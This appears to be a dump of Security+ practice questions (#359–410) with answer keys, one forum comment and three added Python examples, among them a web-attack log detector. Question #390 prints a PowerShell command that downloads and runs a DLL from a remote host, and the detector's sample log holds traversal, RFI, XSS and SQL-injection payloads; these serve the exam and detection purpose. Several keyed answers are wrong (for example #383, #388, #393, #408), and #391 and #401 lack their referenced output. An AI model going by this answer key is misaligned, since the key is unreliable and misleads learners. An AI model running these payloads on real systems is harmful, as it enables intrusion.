Question #359 Topic 1

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical
failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file
server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

A. Segmentation

B. Firewall allow list

C. Containment

D. Isolation

Correct Answer: B

Question #360 Topic 1

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

A. File integrity monitoring

B. Honeynets

C. Tcpreplay

D. Data loss prevention

Correct Answer: D

Question #361 Topic 1

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only
contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Correct Answer: C
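
Added example (not from the ExamTopics page) that encodes the two compliance requirements of Question #361 as a check and runs it over the four certificate descriptions exactly as the page prints them: validity no longer than a year, and a wildcard only as the leftmost label one level below a host under the base domain (`*.app1.comptia.org`, not `*.comptia.org`). That a wildcard is required at all is an assumption made here so that option B is not reported as compliant.

```python
from datetime import datetime, timedelta

# The four certificate descriptions from the question, in the page's own format.
OPTIONS = {
    "A": "HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022",
    "B": "HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022",
    "C": "HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022",
    "D": "HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023",
}
DATE_FMT = "%B %d %H:%M:%S %Y"

def parse_option(text: str) -> tuple[str, datetime, datetime]:
    url, validity = text.split(", Valid from ")
    name = url.split("://", 1)[1].lower()
    start, end = (datetime.strptime(s.strip(), DATE_FMT) for s in validity.split(" - "))
    return name, start, end

def wildcard_violations(name: str, base_domain: str) -> list[str]:
    """Policy: a wildcard is required (assumption for this example) and must
    be the single leftmost label exactly one level below a host under the
    base domain, i.e. *.host.base_domain."""
    labels = name.split(".")
    base = base_domain.split(".")
    if "*" not in labels:
        return ["no wildcard present"]
    if labels.count("*") > 1 or labels[0] != "*":
        return ["wildcard must be the single leftmost label"]
    rest = labels[1:]
    if rest[-len(base):] != base:
        return [f"not under {base_domain}"]
    if len(rest) != len(base) + 1:
        return ["wildcard must sit at the secondary subdomain level"]
    return []

def validity_violations(start: datetime, end: datetime, max_days: int = 365) -> list[str]:
    if end <= start:
        return ["notAfter is not after notBefore"]
    if end - start > timedelta(days=max_days):
        return [f"validity exceeds {max_days} days (annual rotation)"]
    return []

def check_option(text: str, base_domain: str = "comptia.org") -> list[str]:
    """All policy violations for one certificate description; empty means compliant."""
    name, start, end = parse_option(text)
    return wildcard_violations(name, base_domain) + validity_violations(start, end)

def compliant_options(options: dict = OPTIONS) -> list[str]:
    return [letter for letter, text in options.items() if not check_option(text)]

if __name__ == "__main__":
    for letter, text in OPTIONS.items():
        print(letter, check_option(text) or "compliant")
```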

Question #362 Topic 1

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be
BEST to help the organization's executives determine their next course of action?

A. An incident response plan

B. A communication plan

C. A disaster recovery plan

D. A business continuity plan

Correct Answer: D

Question #363 Topic 1

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred.
Which of the following is the analyst MOST likely seeing?

A. http://sample.url.com/

B. http://sample.url.com/someotherpageonsite/../../../etc/shadow

C. http://sample.url.com/select-from-database-where-password-null

D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

Correct Answer: B
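
Added example (not from the ExamTopics page) of the kind of classification an analyst performs on the web server lines in Questions #330, #348 and #363, whose log excerpts are not reproduced on this page: each request path is URL-decoded (twice, to catch double encoding) and matched against simple indicators for directory traversal, LFI, RFI, XSS and SQLi. The log lines are constructed; the traversal one mirrors option B of Question #363, and the indicators are illustrative rather than a WAF-grade ruleset.

```python
import re
from urllib.parse import unquote

# Indicators keyed by the vulnerability classes named in the questions.
INDICATORS = [
    ("Directory traversal", re.compile(r"\.\./|\.\.\\")),
    ("LFI", re.compile(r"/etc/(?:passwd|shadow)|boot\.ini|win\.ini", re.I)),
    ("RFI", re.compile(r"[?&][\w\-]+=(?:https?|ftp)://", re.I)),
    ("XSS", re.compile(r"<script|javascript:|on(?:error|load)\s*=", re.I)),
    ("SQLi", re.compile(r"'\s*(?:or|and)\s+[\w']+\s*=|union\s+select|;\s*drop\s", re.I)),
]

# Combined-log-format prefix: client, ident, user, [timestamp], "METHOD PATH PROTO" STATUS
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def decode_path(path: str) -> str:
    """URL-decode twice so %252e%252e/ (double-encoded ../) is seen as ../."""
    return unquote(unquote(path))

def classify_request(path: str) -> list[str]:
    decoded = decode_path(path)
    return [label for label, rx in INDICATORS if rx.search(decoded)]

def analyze_log(lines: list[str]) -> list[dict]:
    """Return one finding per log line that matches at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify_request(m["path"])
        if labels:
            findings.append({"ip": m["ip"], "path": m["path"],
                             "status": int(m["status"]), "labels": labels})
    return findings

# Constructed sample lines; the second mirrors option B of Question #363.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Feb/2023:19:26:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Feb/2023:19:26:02 +0000] "GET /someotherpageonsite/../../../etc/shadow HTTP/1.1" 403 0',
    '203.0.113.5 - - [04/Feb/2023:19:26:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 2048',
    '203.0.113.5 - - [04/Feb/2023:19:26:04 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt HTTP/1.1" 500 0',
    '203.0.113.5 - - [04/Feb/2023:19:26:05 +0000] "GET /login?user=admin%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 128',
    '203.0.113.5 - - [04/Feb/2023:19:26:06 +0000] "GET /img/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {', '.join(f['labels'])}: {f['path']}")
```

Note that the traversal line is tagged with both "Directory traversal" and "LFI": the `../` sequence is the traversal, and `/etc/shadow` is the local file being included, which is why Question #348 expects two answers for a line of that shape. The status code is kept in the finding because a 403 or 404 tells the analyst the attempt was blocked, while a 200 warrants immediate follow-up.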

Question #364 Topic 1

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate
website. Which of the following BEST describes this type of attack?

A. Reconnaissance

B. Impersonation

C. Typosquatting

D. Watering-hole

Correct Answer: C

Question #365 Topic 1

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of
specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

A. NAC

B. ACL

C. WAF

D. NAT

Correct Answer: B

Question #366 Topic 1

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies
successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the
issue?

A. A non-disclosure agreement

B. Least privilege

C. An acceptable use policy

D. Offboarding

Correct Answer: D

Question #367 Topic 1

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported
specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.

B. The MRI vendor does not support newer versions of the OS.

C. Changing the OS breaches a support SLA with the MRI vendor.

D. The IT team does not have the budget required to upgrade the MRI scanner.

Correct Answer: B

Question #368 Topic 1

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems.
Which of the following is the company MOST likely complying with?

A. NIST CSF

B. GDPR

C. PCI DSS

D. ISO 27001

Correct Answer: B

Question #369 Topic 1

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network
rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack

B. Installing a managed PDU

C. Using only a dual power supplies unit

D. Increasing power generator capacity

Correct Answer: B

Question #370 Topic 1

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer
implement?

A. CASB

B. WAF

C. Load balancer

D. VPN

Correct Answer: B

Question #371 Topic 1

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails
residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these
requirements? (Choose two.)

A. Full device encryption

B. Network usage rules

C. Geofencing

D. Containerization

E. Application approve list

F. Remote control

Correct Answer: DF

Question #372 Topic 1

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would
provide the MOST secure remote access? (Choose two.)

A. IPSec

B. SFTP

C. SRTP

D. LDAPS

E. S/MIME

F. SSL VPN

Correct Answer: AF

Question #373 Topic 1

A malicious actor recently penetrated a company's network and moved laterally to the data center. Upon investigation, a forensics firm wants to
know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

A. Security

B. Application

C. Dump

D. Syslog

Correct Answer: C

Question #374 Topic 1

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship
management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the
company?

A. SaaS

B. IaaS

C. PaaS

D. SDN

Correct Answer: A

Question #375 Topic 1

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider?
(Choose two.)

A. Chain of custody

B. Tags

C. Reports

D. Time stamps

E. Hash values

F. Time offset

Correct Answer: DF

VHuckle 18 hours, 49 minutes ago
Selected Answer: DF
Hashing makes no sense, as it has nothing to do with the order in which the logs are captured. Time stamps and the time offset (think time zones) will definitely impact the order in which they are displayed.
upvoted 1 times

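Added example (not from the ExamTopics page) of what Question #375 is getting at: three servers log the same incident with timestamps in three different UTC offsets, so the raw text sorts in the wrong order until every stamp is normalised to UTC and any known clock skew per host is subtracted. The log lines, host names and skew values are constructed.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Optional

# Constructed lines from three hosts, each writing RFC 3339 timestamps in its
# own offset.  The events happened one second apart in the order db01, web02,
# web01, which the raw text does not show.
LOG_LINES = [
    "web01 2023-02-04T19:26:03+01:00 sshd[1204]: Accepted publickey for deploy from 203.0.113.5",
    "db01 2023-02-04T13:26:01-05:00 postgres[88]: connection authorized: user=deploy database=crm",
    "web02 2023-02-04T18:26:02Z nginx: 203.0.113.5 GET /admin 403",
]
LINE_RE = re.compile(r"^(?P<host>\S+) (?P<ts>\S+) (?P<msg>.*)$")

def parse_timestamp(ts: str) -> datetime:
    """RFC 3339 timestamp to an aware datetime.  'Z' is rewritten because
    fromisoformat() only accepts it on recent Python versions."""
    dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    if dt.tzinfo is None:
        raise ValueError(f"timestamp without offset: {ts}")
    return dt

def normalize(line: str, skew_seconds: Optional[dict] = None) -> dict:
    """Convert one line to UTC and apply a per-host clock correction.
    skew_seconds maps host -> seconds its clock is known to run fast (+) or slow (-)."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    utc = parse_timestamp(m["ts"]).astimezone(timezone.utc)
    utc -= timedelta(seconds=(skew_seconds or {}).get(m["host"], 0))
    return {"host": m["host"], "utc": utc, "msg": m["msg"]}

def order_events(lines: list[str], skew_seconds: Optional[dict] = None) -> list[dict]:
    """The server farm's lines in true chronological order."""
    return sorted((normalize(line, skew_seconds) for line in lines), key=lambda e: e["utc"])

if __name__ == "__main__":
    for e in order_events(LOG_LINES):
        print(e["utc"].isoformat(), e["host"], e["msg"])
```

A timestamp with no offset at all (classic syslog "Feb  4 18:26:04") is rejected rather than guessed, because silently assuming UTC is exactly how a timeline ends up wrong; record the offset at the source or fix it in the collector.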
Question #376 Topic 1

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an
organization?

A. To provide data to quantify risk based on the organization's systems

B. To keep all software and hardware fully patched for known vulnerabilities

C. To only allow approved, organization-owned devices onto the business network

D. To standardize by selecting one laptop model for all users in the organization

Correct Answer: C

Question #377 Topic 1

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top
secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory

B. Rule-based

C. Discretionary

D. Role-based

Correct Answer: D

Question #378 Topic 1

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of
data and how to process it?

A. Data custodian

B. Data controller

C. Data protection officer

D. Data processor

Correct Answer: B

Question #379 Topic 1

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the
network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall

B. SIEM

C. IPS

D. Protocol analyzer

Correct Answer: B

Question #380 Topic 1

Which of the following types of controls is a turnstile?

A. Physical

B. Detective

C. Corrective

D. Technical

Correct Answer: A

Question #381 Topic 1

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule
implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the
security analyst use to help identify if the traffic is being blocked?

A. nmap

B. tracert

C. ping

D. ssh

Correct Answer: B

Question #382 Topic 1

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the
ability to use USB storage devices on their laptops. The review yielded the following results:

• The exception process and policy have been correctly followed by the majority of users.
• A small number of users did not create tickets for the requests but were granted access.
• All access had been approved by supervisors.
• Valid requests for the access sporadically occurred across multiple departments.
• Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable
time frame?

A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.

B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.

D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

Correct Answer: C

Question #383 Topic 1

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted.
Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not
concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

A. Asymmetric

B. Symmetric

C. Homomorphic

D. Ephemeral

Correct Answer: A

Question #384 Topic 1

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application
was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues
were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the
software as:

A. a rootkit.

B. a PUP.

C. a backdoor.

D. ransomware.

E. a RAT.

Correct Answer: B

Question #385 Topic 1

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be
unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X

B. # iptables -F

C. # iptables -Z

D. # iptables -P INPUT -j DROP

Correct Answer: B

Question #386 Topic 1

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain
chain of custody?

A. Document the collection and require a sign-off when possession changes.

B. Lock the device in a safe or other secure location to prevent theft or alteration.

C. Place the device in a Faraday cage to prevent corruption of the data.

D. Record the collection in a blockchain-protected public ledger.

Correct Answer: A

Question #387 Topic 1

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the
completion of the patch process. Which of the following is the MOST likely cause of the issue?

A. The vendor firmware lacks support.

B. Zero-day vulnerabilities are being discovered.

C. Third-party applications are not being patched.

D. Code development is being outsourced.

Correct Answer: C

Question #388 Topic 1

Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule

B. Closed-circuit television

C. Proximity card reader

D. Faraday cage

Correct Answer: C

Question #389 Topic 1

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following
string in the current user's list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

A. Privilege escalation

B. Memory leak

C. Directory traversal

D. Race condition

Correct Answer: A

Question #390 Topic 1

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does
and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.

B. A PowerShell code is displaying a picture.

C. A PowerShell code is configuring environmental variables.

D. A PowerShell code is changing Windows Update settings.

Correct Answer: A

Question #391 Topic 1

A security engineer obtained the following output from a threat intelligence source that recently performed an attack on the company’s server:

Which of the following BEST describes this kind of attack?

A. Directory traversal

B. SQL injection

C. API

D. Request forgery

Correct Answer: A

Question #392 Topic 1

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect
data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer

B. Data owner

C. Backup administrator

D. Data custodian

E. Internal auditor

Correct Answer: C

Question #393 Topic 1

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team

B. Purple team

C. Green team

D. Blue team

E. Red team

Correct Answer: B

Question #394 Topic 1

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9.

B. Critical infrastructure vulnerabilities on non-IP protocols.

C. CVEs related to non-Microsoft systems such as printers and switches.

D. Missing patches for third-party software on Windows workstations and servers.

Correct Answer: D

Question #395 Topic 1

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions
should the administrator choose?

A. MAC filtering

B. Anti-malware

C. Translation gateway

D. VPN

Correct Answer: D

Question #396 Topic 1

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had
been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs

B. The web server logs

C. The SIP traffic logs

D. The SNMP logs

Correct Answer: B

Question #397 Topic 1

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the
key?

A. .pfx

B. .csr

C. .pvk

D. .cer

Correct Answer: D

Question #398 Topic 1

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following
should the administrator consider?

A. Hashing

B. Salting

C. Lightweight cryptography

D. Steganography

Correct Answer: B

Question #399 Topic 1

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

• www.company.com (main website)
• contactus.company.com (for locating a nearby location)
• quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same
naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN

B. Wildcard

C. Extended validation

D. Self-signed

Correct Answer: B

Question #400 Topic 1

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst
monitor?

A. SFTP

B. AIS

C. Tor

D. IoC

Correct Answer: C

Question #401 Topic 1

A security analyst is reviewing logs on a server and observes the following output:

Which of the following is the security analyst observing?

A. A rainbow table attack

B. A password-spraying attack

C. A dictionary attack

D. A keylogger attack

Correct Answer: C

Question #402 Topic 1

A company is launching a website in a different country in order to capture user information that a marketing business can use. The company
itself will not be using the information. Which of the following roles is the company assuming?

A. Data owner

B. Data processor

C. Data steward

D. Data collector

Correct Answer: D

Question #403 Topic 1

An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud provider?

A. SLA

B. BPA

C. NDA

D. MOU

Correct Answer: A

Question #404 Topic 1

Which of the following secure application development concepts aims to block verbose error messages from being shown in a user’s interface?

A. OWASP

B. Obfuscation/camouflage

C. Test environment

D. Prevention of information exposure

Correct Answer: D

Question #405 Topic 1

If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?

A. Perfect forward secrecy

B. Elliptic-curve cryptography

C. Key stretching

D. Homomorphic encryption

Correct Answer: A

Question #406 Topic 1

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50
employees working on any given day. Which of the following VPN solutions would BEST support the new office?

A. Always-on

B. Remote access

C. Site-to-site

D. Full tunnel

Correct Answer: C

Question #407 Topic 1

Which of the following scenarios BEST describes a risk reduction technique?

A. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned
about losses from data breaches.

B. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure
method of operation.

C. A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations
have occurred.

D. A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

Correct Answer: B

Question #408 Topic 1

Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the
email to others?

A. Hoaxing

B. Pharming

C. Watering-hole

D. Phishing

Correct Answer: D

Question #409 Topic 1

Which of the following will provide the BEST physical security countermeasures to stop intruders? (Choose two.)

A. Alarms

B. Signage

C. Lighting

D. Access control vestibules

E. Fencing

F. Sensors

Correct Answer: DE

Question #410 Topic 1

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the
following should be the first lines of defense against such an attack? (Choose two.)

A. MAC filtering

B. Zero trust segmentation

C. Network access control

D. Access control vestibules

E. Guards

F. Bollards

Correct Answer: AC
